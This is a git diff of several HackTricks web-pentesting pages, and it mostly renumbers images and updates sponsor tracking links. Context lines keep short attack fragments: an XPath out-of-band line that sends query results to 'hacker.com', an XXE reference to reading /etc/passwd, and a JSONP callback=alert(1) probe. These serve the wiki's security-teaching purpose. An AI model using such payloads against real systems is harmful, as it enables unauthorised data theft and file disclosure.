-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ssrf-server-side-request-forgery" %}
 
 <details>
 
@@ -217,13 +217,13 @@ if __name__ == "__main__":
     app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
 ```
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ssrf-server-side-request-forgery) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ssrf-server-side-request-forgery" %}
 
 ## Misconfigured proxies to SSRF
 
@@ -266,7 +266,7 @@ Connection: close
 
 Vulnerable code:
 
-<figure><img src="../../.gitbook/assets/image (1198).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1201).png" alt=""><figcaption></figcaption></figure>
 
 It was discovered that It's possible to **start the path** of a request with character **`;`** which allows to use then **`@`**  and inject a new host to access. Attack request:
 
@@ -420,10 +420,10 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ssrf-server-side-request-forgery) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ssrf-server-side-request-forgery" %}
diff --git a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
index 5faea9baa..3c654ed83 100644
--- a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
+++ b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
@@ -93,7 +93,7 @@ http://bugbounty.dod.network = 127.0.0.2 (localhost)
 spoofed.burpcollaborator.net = 127.0.0.1
 ```
 
-![](<../../.gitbook/assets/image (773).png>)
+![](<../../.gitbook/assets/image (776).png>)
 
 The **Burp extension** [**Burp-Encode-IP**](https://github.com/e1abrador/Burp-Encode-IP) implements IP formatting bypasses.
 
@@ -216,7 +216,7 @@ The _backslash-trick_ exploits a difference between the [WHATWG URL Standard](ht
 
 ### Other Confusions
 
-![https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](<../../.gitbook/assets/image (597).png>)
+![https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](<../../.gitbook/assets/image (600).png>)
 
 image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)
 
diff --git a/pentesting-web/ssti-server-side-template-injection/README.md b/pentesting-web/ssti-server-side-template-injection/README.md
index 92d93ff57..a55ff4a0f 100644
--- a/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/pentesting-web/ssti-server-side-template-injection/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (637).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (641).png" alt=""><figcaption></figcaption></figure>
 
 [**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
 
diff --git a/pentesting-web/ssti-server-side-template-injection/el-expression-language.md b/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
index 385986907..fc6b7a535 100644
--- a/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
+++ b/pentesting-web/ssti-server-side-template-injection/el-expression-language.md
@@ -7,14 +7,14 @@
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 </details>
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -24,20 +24,20 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Bsic Info
 
 Expression Language (EL) is integral in JavaEE for bridging the presentation layer (e.g., web pages) and application logic (e.g., managed beans), enabling their interaction. It's predominantly used in:
 
-- **JavaServer Faces (JSF)**: For binding UI components to backend data/actions.
-- **JavaServer Pages (JSP)**: For data access and manipulation within JSP pages.
-- **Contexts and Dependency Injection for Java EE (CDI)**: For facilitating web layer interaction with managed beans.
+* **JavaServer Faces (JSF)**: For binding UI components to backend data/actions.
+* **JavaServer Pages (JSP)**: For data access and manipulation within JSP pages.
+* **Contexts and Dependency Injection for Java EE (CDI)**: For facilitating web layer interaction with managed beans.
 
 **Usage Contexts**:
 
-- **Spring Framework**: Applied in various modules like Security and Data.
-- **General Use**: Through SpEL API by developers in JVM-based languages like Java, Kotlin, and Scala.
+* **Spring Framework**: Applied in various modules like Security and Data.
+* **General Use**: Through SpEL API by developers in JVM-based languages like Java, Kotlin, and Scala.
 
 EL's is present in JavaEE technologies, standalone environments, and recognizable through `.jsp` or `.jsf` file extensions, stack errors, and terms like "Servlet" in headers. However, its features and the use of certain characters can be version-dependent.
 
@@ -98,7 +98,7 @@ Note how in the previous example the term `{5*5}` was **evaluated**.
 
 ## **CVE Based Tutorial**
 
-Check it in **this post: [https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a](https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a)**
+Check it in **this post:** [**https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a**](https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a)
 
 ## Payloads
 
@@ -274,7 +274,7 @@ Check [https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https://
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -291,7 +291,7 @@ You can check their website and try their engine for **free** at:
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 </details>
diff --git a/pentesting-web/unicode-injection/unicode-normalization.md b/pentesting-web/unicode-injection/unicode-normalization.md
index ccff4eaf6..f6fc462ca 100644
--- a/pentesting-web/unicode-injection/unicode-normalization.md
+++ b/pentesting-web/unicode-injection/unicode-normalization.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 **This is a summary of:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/). Check a look for further details (images taken form there).
 
@@ -73,7 +73,7 @@ Imagine a web page that is using the character `'` to create SQL queries with th
 
 Then, a malicious user could insert a different Unicode character equivalent to `' (0x27)` like `%ef%bc%87` , when the input gets normalised, a single quote is created and a **SQLInjection vulnerability** appears:
 
-![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (699).png>)
+![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (702).png>)
 
 **Some interesting Unicode characters**
 
@@ -131,7 +131,7 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\* allows t
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
diff --git a/pentesting-web/xpath-injection.md b/pentesting-web/xpath-injection.md
index af7679dfa..9592dd522 100644
--- a/pentesting-web/xpath-injection.md
+++ b/pentesting-web/xpath-injection.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -317,7 +317,7 @@ doc-available(concat("http://hacker.com/oob/", RESULTS))
 * [https://wiki.owasp.org/index.php/Testing\_for\_XPath\_Injection\_(OTG-INPVAL-010)](https://wiki.owasp.org/index.php/Testing\_for\_XPath\_Injection\_\(OTG-INPVAL-010\))
 * [https://www.w3schools.com/xml/xpath\_syntax.asp](https://www.w3schools.com/xml/xpath\_syntax.asp)
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
diff --git a/pentesting-web/xs-search/README.md b/pentesting-web/xs-search/README.md
index 49b2724ed..1e16fcef5 100644
--- a/pentesting-web/xs-search/README.md
+++ b/pentesting-web/xs-search/README.md
@@ -1,11 +1,11 @@
 # XS-Search/XS-Leaks
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [****](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=xs-search) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}
 
 <details>
 
@@ -71,13 +71,13 @@ You can **access the tool in** [**https://xsinator.com/**](https://xsinator.com/
 **Excluded XS-Leaks**: We had to exclude XS-Leaks that rely on **service workers** as they would interfere with other leaks in XSinator. Furthermore, we chose to **exclude XS-Leaks that rely on misconfiguration and bugs in a specific web application**. For example, CrossOrigin Resource Sharing (CORS) misconfigurations, postMessage leakage or Cross-Site Scripting. Additionally, we excluded timebased XS-Leaks since they often suffer from being slow, noisy and inaccurate.
 {% endhint %}
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=xs-search) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}
 
 ## **Timing Based techniques**
 
@@ -222,12 +222,12 @@ You can perform the same attack with **`portal`** tags.
 
 Applications frequently utilize [`postMessage` broadcasts](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage) to communicate across different origins. However, this method can inadvertently expose **sensitive information** if the `targetOrigin` parameter is not properly specified, allowing any window to receive the messages. Furthermore, the mere act of receiving a message can act as an **oracle**; for instance, certain messages might only be sent to users who are logged in. Therefore, the presence or absence of these messages can reveal information about the user's state or identity, such as whether they are authenticated or not.
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=xs-search) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}
 
 ## Global Limits Techniques
 
@@ -814,7 +814,7 @@ Or could just **send some fetch to the pontentially cached page and measure the
 * **Summary:** It's possible to find out if a response to a fetch request is a redirect
 * **Code Example**:
 
-![](<../../.gitbook/assets/image (766).png>)
+![](<../../.gitbook/assets/image (769).png>)
 
 ### Fetch with AbortController <a href="#fetch-with-abortcontroller" id="fetch-with-abortcontroller"></a>
 
@@ -866,13 +866,13 @@ In an execution timing it's possible to **eliminate** **network factors** to obt
 * **Summary:** se [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) to measure the time it takes to perform a request using `window.open`. Other clocks could be used.
 * **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks)
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=xs-search) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}
 
 ## With HTML or Re Injection
 
@@ -970,10 +970,10 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}
diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
index b8f49b4a4..1ad72fe44 100644
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -1,6 +1,6 @@
 # XSS (Cross Site Scripting)
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -106,13 +106,13 @@ Several web pages have endpoints that **accept as parameter the name of the func
 
 A good way to find out if something given directly by the user is trying to be executed is **modifying the param value** (for example to 'Vulnerable') and looking in the console for errors like:
 
-![](<../../.gitbook/assets/image (708).png>)
+![](<../../.gitbook/assets/image (711).png>)
 
 In case it's vulnerable, you could be able to **trigger an alert** just doing sending the value: **`?callback=alert(1)`**. However, it' very common that this endpoints will **validate the content** to only allow letters, numbers, dots and underscores (**`[\w\._]`**).
 
 However, even with that limitation it's still possible to perform some actions. This is because you can use that valid chars to **access any element in the DOM**:
 
-![](<../../.gitbook/assets/image (744).png>)
+![](<../../.gitbook/assets/image (747).png>)
 
 Some useful functions for this:
 
@@ -1544,7 +1544,7 @@ Find **more SVG payloads in** [**https://github.com/allanlw/svg-cheatsheet**](ht
 * [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)
 * [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md b/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
index b7a445114..79a93c0aa 100644
--- a/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
+++ b/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
@@ -31,11 +31,11 @@ You need to **create a local empty folder to be used to store the overrides**, s
 
 Then, in "Dev Tools" --> "Sources" **select the file** you want to override and with **right click select "Save for overrides"**.
 
-![](<../../.gitbook/assets/image (739).png>)
+![](<../../.gitbook/assets/image (742).png>)
 
 This will **copy the JS file locally** and you will be able to **modify that copy in the browser**. So just add the **`debugger;`** command wherever you want, **save** the change and **reload** the page, and every-time you access that web page **your local JS copy is going to be loaded** and your debugger command maintained in its place:
 
-![](<../../.gitbook/assets/image (591).png>)
+![](<../../.gitbook/assets/image (594).png>)
 
 ## References
 
diff --git a/pentesting-web/xss-cross-site-scripting/dom-invader.md b/pentesting-web/xss-cross-site-scripting/dom-invader.md
index d8114cfc6..d0778215d 100644
--- a/pentesting-web/xss-cross-site-scripting/dom-invader.md
+++ b/pentesting-web/xss-cross-site-scripting/dom-invader.md
@@ -29,11 +29,11 @@ DOM Invader integrates a tab within the browser's DevTools panel enabling the fo
 
 In the Burp's builtin browser go to the **Burp extension** and enable it:
 
-<figure><img src="../../.gitbook/assets/image (1126).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1129).png" alt=""><figcaption></figcaption></figure>
 
 Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:**
 
-<figure><img src="../../.gitbook/assets/image (692).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (695).png" alt=""><figcaption></figcaption></figure>
 
 ### Inject a Canary
 
@@ -71,7 +71,7 @@ Detailed information can be viewed about each message by clicking on it, which i
 
 DOM Invader can also search for **Prototype Pollution vulnerabilities**. First, you need to enable it:
 
-<figure><img src="../../.gitbook/assets/image (1023).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1026).png" alt=""><figcaption></figcaption></figure>
 
 Then, it will **search for sources** that enable you to add arbitrary properties to the **`Object.prototype`**.
 
diff --git a/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md b/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
index 299a6260b..dc662a291 100644
--- a/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
+++ b/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
@@ -84,7 +84,7 @@ Therefore it’s possible to bypass the CSP of a page with:
 Note how the **previous CSP only permits the execution of the inline script**.\
 However, **only `if1` and `if2` scripts are going to be executed but only `if1` will be able to access the parent secret**.
 
-![](<../../.gitbook/assets/image (369).png>)
+![](<../../.gitbook/assets/image (372).png>)
 
 Therefore, it’s possible to **bypass a CSP if you can upload a JS file to the server and load it via iframe even with `script-src 'none'`**. This can **potentially be also done abusing a same-site JSONP endpoint**.
 
diff --git a/pentesting-web/xss-cross-site-scripting/other-js-tricks.md b/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
index 85b7d2a00..cb447d066 100644
--- a/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
+++ b/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
@@ -231,9 +231,9 @@ The tool **Hackability inspector** from Portswigger helps to **analyze** the **a
 
 The decrement operator `--` is also an asignment. This operator takes a value and then decrements it by one. If that value is not a number, it will be set to `NaN`. This can be used to **remove the content of variables from the environment**.
 
-![](<../../.gitbook/assets/image (990).png>)
+![](<../../.gitbook/assets/image (993).png>)
 
-![](<../../.gitbook/assets/image (326).png>)
+![](<../../.gitbook/assets/image (329).png>)
 
 ## Functions Tricks
 
diff --git a/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md b/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md
index cd93c6c2e..b7b07cd02 100644
--- a/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md
+++ b/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md
@@ -7,14 +7,14 @@
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 </details>
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -24,7 +24,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Same Origin Method Execution
 
@@ -71,7 +71,7 @@ Moreover, in order for the second page to be able to use the opener object **bot
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 </details>
diff --git a/pentesting-web/xxe-xee-xml-external-entity.md b/pentesting-web/xxe-xee-xml-external-entity.md
index 704576456..8b15ad610 100644
--- a/pentesting-web/xxe-xee-xml-external-entity.md
+++ b/pentesting-web/xxe-xee-xml-external-entity.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -47,7 +47,7 @@ In this attack I'm going to test if a simple new ENTITY declaration is working
 </stockCheck>
 ```
 
-![](<../.gitbook/assets/image (867).png>)
+![](<../.gitbook/assets/image (870).png>)
 
 ### Read file
 
@@ -61,7 +61,7 @@ In this first case notice that SYSTEM "_\*\*file:///\*\*etc/passwd_" will also w
 <data>&example;</data>
 ```
 
-![](<../.gitbook/assets/image (83).png>)
+![](<../.gitbook/assets/image (86).png>)
 
 This second case should be useful to extract a file if the web server is using PHP (Not the case of Portswiggers labs)
 
@@ -85,7 +85,7 @@ In this third case notice we are declaring the `Element stockCheck` as ANY
 </stockCheck3>
 ```
 
-![](<../.gitbook/assets/image (750).png>)
+![](<../.gitbook/assets/image (753).png>)
 
 ### Directory listing
 
@@ -121,7 +121,7 @@ Using the **previously commented technique** you can make the server access a se
 
 ### "Blind" SSRF - Exfiltrate data out-of-band
 
